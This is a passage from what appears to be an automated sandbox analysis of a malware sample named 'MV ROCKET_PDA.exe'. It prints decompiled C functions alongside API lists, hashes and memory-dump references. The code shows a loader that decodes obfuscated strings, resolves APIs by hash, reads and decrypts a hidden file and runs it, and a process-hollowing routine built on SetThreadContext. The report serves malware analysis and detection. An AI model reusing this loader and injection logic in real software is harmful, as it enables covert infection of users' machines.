												if(SetThreadContext(_v60.hThread,  &_v876) != 0) {
													_t165 = E72E45326(_t219, _t228, _v60.hThread); // executed
													if(_t165 != 0) {
														return 0;
													}
													return 1;
												}
												return 1;
											}
											return 1;
										}
										return 1;
									}
									return 1;
								}
								_t217 = _v8;
								if(_v40 >  *(_v8 + 0x34) +  *(_v8 + 0x50)) {
									goto L18;
								}
								_t186 = E72E454D8(_t217, _t228, _v60, _v40); // executed
								if(_t186 == 0) {
									goto L18;
								}
								return 1;
							}
							return 1;
						}
						return 1;
					}
					return 1;
				}
				return 1;
			}































                                                                                            0x72e46331
                                                                                            0x72e46339
                                                                                            0x72e46341
                                                                                            0x72e46349
                                                                                            0x72e46351
                                                                                            0x72e46359
                                                                                            0x72e46361
                                                                                            0x72e46369
                                                                                            0x72e46371
                                                                                            0x72e46379
                                                                                            0x72e46381
                                                                                            0x72e46389
                                                                                            0x72e46391
                                                                                            0x72e46394
                                                                                            0x72e46399
                                                                                            0x72e463a1
                                                                                            0x72e463a4
                                                                                            0x72e463a7
                                                                                            0x72e463ad
                                                                                            0x72e463b3
                                                                                            0x72e463c0
                                                                                            0x72e463c4
                                                                                            0x72e463c7
                                                                                            0x72e463d1
                                                                                            0x72e463d4
                                                                                            0x72e463dd
                                                                                            0x72e463e4
                                                                                            0x72e463eb
                                                                                            0x72e463eb
                                                                                            0x72e463f0
                                                                                            0x72e463fd
                                                                                            0x72e46400
                                                                                            0x72e46409
                                                                                            0x72e46410
                                                                                            0x72e46417
                                                                                            0x72e46417
                                                                                            0x72e46422
                                                                                            0x72e46425
                                                                                            0x72e46430
                                                                                            0x72e46431
                                                                                            0x72e46438
                                                                                            0x72e4646c
                                                                                            0x72e46476
                                                                                            0x72e4648f
                                                                                            0x72e464b3
                                                                                            0x72e464c0
                                                                                            0x72e464c6
                                                                                            0x72e464f0
                                                                                            0x72e46509
                                                                                            0x72e46510
                                                                                            0x72e4651a
                                                                                            0x72e4651f
                                                                                            0x72e46522
                                                                                            0x72e46522
                                                                                            0x72e46525
                                                                                            0x72e46528
                                                                                            0x72e4652b
                                                                                            0x72e46532
                                                                                            0x72e4653c
                                                                                            0x72e46549
                                                                                            0x72e46555
                                                                                            0x72e4655e
                                                                                            0x72e46570
                                                                                            0x72e46571
                                                                                            0x72e46575
                                                                                            0x72e4657b
                                                                                            0x72e4657f
                                                                                            0x72e46580
                                                                                            0x72e46583
                                                                                            0x72e46546
                                                                                            0x72e46546
                                                                                            0x72e4658a
                                                                                            0x72e4658c
                                                                                            0x72e46591
                                                                                            0x72e4659b
                                                                                            0x72e4659c
                                                                                            0x72e4659f
                                                                                            0x72e465a6
                                                                                            0x72e465ad
                                                                                            0x72e465b3
                                                                                            0x72e465b6
                                                                                            0x72e465cb
                                                                                            0x72e465d5
                                                                                            0x72e465dc
                                                                                            0x00000000
                                                                                            0x72e465e3
                                                                                            0x00000000
                                                                                            0x72e465e0
                                                                                            0x00000000
                                                                                            0x72e465cf
                                                                                            0x00000000
                                                                                            0x72e465aa
                                                                                            0x00000000
                                                                                            0x72e46536
                                                                                            0x00000000
                                                                                            0x72e46514
                                                                                            0x72e464ce
                                                                                            0x72e464d7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x72e464df
                                                                                            0x72e464e6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x72e464ea
                                                                                            0x00000000
                                                                                            0x72e464b7
                                                                                            0x00000000
                                                                                            0x72e46493
                                                                                            0x00000000
                                                                                            0x72e46470
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 72E46467
                                                                                            • GetThreadContext.KERNELBASE(?,00010007), ref: 72E4648A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: ContextCreateProcessThread
                                                                                            • String ID: D$Ear$Ear
                                                                                            • API String ID: 2843130473-2750164508
                                                                                            • Opcode ID: e681e3eb1a2439bf9aab9f9235277d4190533b7d2f267c58875b5d57bb978e53
                                                                                            • Instruction ID: 93049a8dd92454879bff7adbce0fa9ddfc639723d007dfee6bddb0514bbd6f9e
                                                                                            • Opcode Fuzzy Hash: e681e3eb1a2439bf9aab9f9235277d4190533b7d2f267c58875b5d57bb978e53
                                                                                            • Instruction Fuzzy Hash: 09A1D5B0E00109EFDB41DFA8E980BAEBBB5BF08305F109469F915EB254DB75AA51CF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405375, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405375(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                            0x00405380
                                                                                            0x00405384
                                                                                            0x00405387
                                                                                            0x0040538d
                                                                                            0x00405391
                                                                                            0x00405395
                                                                                            0x0040539d
                                                                                            0x004053a4
                                                                                            0x004053aa
                                                                                            0x004053b1
                                                                                            0x004053b8
                                                                                            0x004053c0
                                                                                            0x004053c2
                                                                                            0x00000000
                                                                                            0x004053c2
                                                                                            0x004053cc
                                                                                            0x004053d3
                                                                                            0x004053e9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004053eb
                                                                                            0x004053ef

                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                                                            • GetLastError.KERNEL32 ref: 004053CC
                                                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
                                                                                            • GetLastError.KERNEL32 ref: 004053EB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                            • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                                                            • API String ID: 3449924974-1782582443
                                                                                            • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                            • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
                                                                                            • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                            • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405EE9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405EE9(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                            0x00405f00
                                                                                            0x00405f09
                                                                                            0x00405f0b
                                                                                            0x00405f0b
                                                                                            0x00405f0f
                                                                                            0x00405f21
                                                                                            0x00405f1b
                                                                                            0x00405f1b
                                                                                            0x00405f1b
                                                                                            0x00405f25
                                                                                            0x00405f39
                                                                                            0x00405f4d
                                                                                            0x00405f54

                                                                                            APIs
                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                                                                            • wsprintfA.USER32 ref: 00405F39
                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%s.dll$UXTHEME$\
                                                                                            • API String ID: 2200240437-4240819195
                                                                                            • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                            • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
                                                                                            • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                            • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004058CD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                            0x004058d1
                                                                                            0x004058d7
                                                                                            0x004058d8
                                                                                            0x004058d8
                                                                                            0x004058d9
                                                                                            0x004058e0
                                                                                            0x004058ea
                                                                                            0x004058f7
                                                                                            0x004058fa
                                                                                            0x00405902
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405906
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405908
                                                                                            0x00000000
                                                                                            0x00405908
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 004058E0
                                                                                            • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: "C:\Users\user\Desktop\MV ROCKET_PDA.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                            • API String ID: 1716503409-1265060053
                                                                                            • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                            • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
                                                                                            • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                            • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E45170, Relevance: 7.7, APIs: 5, Instructions: 193fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E72E45170() {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				char _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				long _v120;
				short _v1160;
				short _t82;
				short _t83;
				short _t84;
				short _t85;
				short _t86;
				short _t87;
				short _t88;
				short _t89;
				short _t90;
				short _t91;
				short _t92;
				short _t107;
				short _t108;
				short _t109;
				short _t110;
				short _t111;
				short _t112;
				short _t113;
				short _t114;
				short _t115;
				short _t116;
				short _t117;
				short _t118;
				short _t119;
				short _t120;
				short _t121;
				void* _t129;
				signed int _t130;
				void* _t131;
				int _t133;
				void* _t136;

				_t82 = 0x53;
				_v44 = _t82;
				_t83 = 0x68;
				_v42 = _t83;
				_t84 = 0x6c;
				_v40 = _t84;
				_t85 = 0x77;
				_v38 = _t85;
				_t86 = 0x61;
				_v36 = _t86;
				_t87 = 0x70;
				_v34 = _t87;
				_t88 = 0x69;
				_v32 = _t88;
				_t89 = 0x2e;
				_v30 = _t89;
				_t90 = 0x64;
				_v28 = _t90;
				_t91 = 0x6c;
				_v26 = _t91;
				_t92 = 0x6c;
				_v24 = _t92;
				_v22 = 0;
				_v12 = _v12 & 0x00000000;
				_v8 = E72E45837();
				_v84 = E72E458E6(_v8, 0x7fc01dae);
				_v116 = E72E458E6(_v8, 0xff7f721a);
				_v80 = E72E458E6(_v8, 0x7fd6a366);
				_v88 = E72E458E6(_v80( &_v44), 0x7f5a653a);
				_v112 = E72E458E6(_v8, 0x7f91a078);
				_v92 = E72E458E6(_v8, 0x7fe63623);
				_v96 = E72E458E6(_v8, 0x7fbd727f);
				_v100 = E72E458E6(_v8, 0x7fb47add);
				_v104 = E72E458E6(_v8, 0x7fe7f840);
				_t146 = _v8;
				_v108 = E72E458E6(_v8, 0x7fe1f1fb);
				_t107 = 0x76;
				_v76 = _t107;
				_t108 = 0x6a;
				_v74 = _t108;
				_t109 = 0x66;
				_v72 = _t109;
				_t110 = 0x63;
				_v70 = _t110;
				_t111 = 0x63;
				_v68 = _t111;
				_t112 = 0x37;
				_v66 = _t112;
				_t113 = 0x74;
				_v64 = _t113;
				_t114 = 0x38;
				_v62 = _t114;
				_t115 = 0x30;
				_v60 = _t115;
				_t116 = 0x75;
				_v58 = _t116;
				_t117 = 0x6f;
				_v56 = _t117;
				_t118 = 0x6c;
				_v54 = _t118;
				_t119 = 0x72;
				_v52 = _t119;
				_t120 = 0x76;
				_v50 = _t120;
				_t121 = 0x37;
				_v48 = _t121;
				_v46 = 0;
				_v84(0x103,  &_v1160);
				_v88( &_v1160,  &_v76);
				_t129 = CreateFileW( &_v1160, 0x80000000, 7, 0, 3, 0x80, 0);
				_v20 = _t129;
				if(_v20 != 0xffffffff) {
					_t130 = _v96(_v20, 0);
					_v12 = _t130;
					if(_v12 != 0xffffffff) {
						_t131 = VirtualAlloc(0, _v12, 0x3000, 4);
						_v16 = _t131;
						if(_v16 != 0) {
							_t133 = ReadFile(_v20, _v16, _v12,  &_v120, 0);
							if(_t133 != 0) {
								FindCloseChangeNotification(_v20);
								_v16 = E72E45B78(_t146, _v16, _v12);
								_t136 = E72E45FFB(_v16); // executed
								ExitProcess(0);
							}
							return _t133;
						}
						return _t131;
					}
					return _t130;
				}
				return _t129;
			}














































































                                                                                            0x72e45958
                                                                                            0x72e45959
                                                                                            0x72e4595f
                                                                                            0x72e45960
                                                                                            0x72e45966
                                                                                            0x72e45967
                                                                                            0x72e4596d
                                                                                            0x72e4596e
                                                                                            0x72e45974
                                                                                            0x72e45975
                                                                                            0x72e4597b
                                                                                            0x72e4597c
                                                                                            0x72e45982
                                                                                            0x72e45983
                                                                                            0x72e45989
                                                                                            0x72e4598a
                                                                                            0x72e45990
                                                                                            0x72e45991
                                                                                            0x72e45997
                                                                                            0x72e45998
                                                                                            0x72e4599e
                                                                                            0x72e4599f
                                                                                            0x72e459a5
                                                                                            0x72e459a9
                                                                                            0x72e459b2
                                                                                            0x72e459c2
                                                                                            0x72e459d2
                                                                                            0x72e459e2
                                                                                            0x72e459f8
                                                                                            0x72e45a08
                                                                                            0x72e45a18
                                                                                            0x72e45a28
                                                                                            0x72e45a38
                                                                                            0x72e45a48
                                                                                            0x72e45a50
                                                                                            0x72e45a58
                                                                                            0x72e45a5d
                                                                                            0x72e45a5e
                                                                                            0x72e45a64
                                                                                            0x72e45a65
                                                                                            0x72e45a6b
                                                                                            0x72e45a6c
                                                                                            0x72e45a72
                                                                                            0x72e45a73
                                                                                            0x72e45a79
                                                                                            0x72e45a7a
                                                                                            0x72e45a80
                                                                                            0x72e45a81
                                                                                            0x72e45a87
                                                                                            0x72e45a88
                                                                                            0x72e45a8e
                                                                                            0x72e45a8f
                                                                                            0x72e45a95
                                                                                            0x72e45a96
                                                                                            0x72e45a9c
                                                                                            0x72e45a9d
                                                                                            0x72e45aa3
                                                                                            0x72e45aa4
                                                                                            0x72e45aaa
                                                                                            0x72e45aab
                                                                                            0x72e45ab1
                                                                                            0x72e45ab2
                                                                                            0x72e45ab8
                                                                                            0x72e45ab9
                                                                                            0x72e45abf
                                                                                            0x72e45ac0
                                                                                            0x72e45ac6
                                                                                            0x72e45ad6
                                                                                            0x72e45ae4
                                                                                            0x72e45b00
                                                                                            0x72e45b03
                                                                                            0x72e45b0a
                                                                                            0x72e45b13
                                                                                            0x72e45b16
                                                                                            0x72e45b1d
                                                                                            0x72e45b2d
                                                                                            0x72e45b30
                                                                                            0x72e45b37
                                                                                            0x72e45b4a
                                                                                            0x72e45b4f
                                                                                            0x72e45b56
                                                                                            0x72e45b64
                                                                                            0x72e45b6a
                                                                                            0x72e45b71
                                                                                            0x72e45b71
                                                                                            0x00000000
                                                                                            0x72e45b4f
                                                                                            0x00000000
                                                                                            0x72e45b37
                                                                                            0x00000000
                                                                                            0x72e45b1d
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72E45B00
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 32d6c9c4ee867524c20408fa2ec9a0e422f566c7003b20c799d92a65c78c77a5
                                                                                            • Instruction ID: 607cdee1f9a873604d02817d6b53409407f6ad5bc36d9435ee200b3474b5259b
                                                                                            • Opcode Fuzzy Hash: 32d6c9c4ee867524c20408fa2ec9a0e422f566c7003b20c799d92a65c78c77a5
                                                                                            • Instruction Fuzzy Hash: F5714035E54348EADB50DBE4F951BEDBBB5AF48710F209416F918FA2E0EB700A41DB05
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 60%
                                                                                            			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42ecd8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404EB3(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                            0x00401f84
                                                                                            0x00401f84
                                                                                            0x00401f89
                                                                                            0x00401f90
                                                                                            0x0040204c
                                                                                            0x00402197
                                                                                            0x00402197
                                                                                            0x004028be
                                                                                            0x004028c1
                                                                                            0x004028cd
                                                                                            0x004028cd
                                                                                            0x00401f9f
                                                                                            0x00401fa9
                                                                                            0x00401fac
                                                                                            0x00401fbb
                                                                                            0x00401fbf
                                                                                            0x00401fc5
                                                                                            0x00401fc9
                                                                                            0x00402045
                                                                                            0x00000000
                                                                                            0x00402045
                                                                                            0x00401fcb
                                                                                            0x00401fd5
                                                                                            0x00401fd9
                                                                                            0x0040201d
                                                                                            0x00401fdb
                                                                                            0x00401fde
                                                                                            0x00401fe1
                                                                                            0x00402011
                                                                                            0x00401fe3
                                                                                            0x00401fe6
                                                                                            0x00401fef
                                                                                            0x00401ff1
                                                                                            0x00401ff1
                                                                                            0x00401fef
                                                                                            0x00401fe1
                                                                                            0x00402025
                                                                                            0x0040203a
                                                                                            0x0040203a
                                                                                            0x00000000
                                                                                            0x00402025
                                                                                            0x00401faf
                                                                                            0x00401fb5
                                                                                            0x00401fb9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                                                                              • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041CC48,74E5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                              • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041CC48,74E5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                              • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041CC48,74E5EA30), ref: 00404F0F
                                                                                              • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                              • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                              • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                              • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 2987980305-0
                                                                                            • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                                                            • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
                                                                                            • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                                                            • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 87%
                                                                                            			E004015B3(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040574E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056E5(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053F2(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405375(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
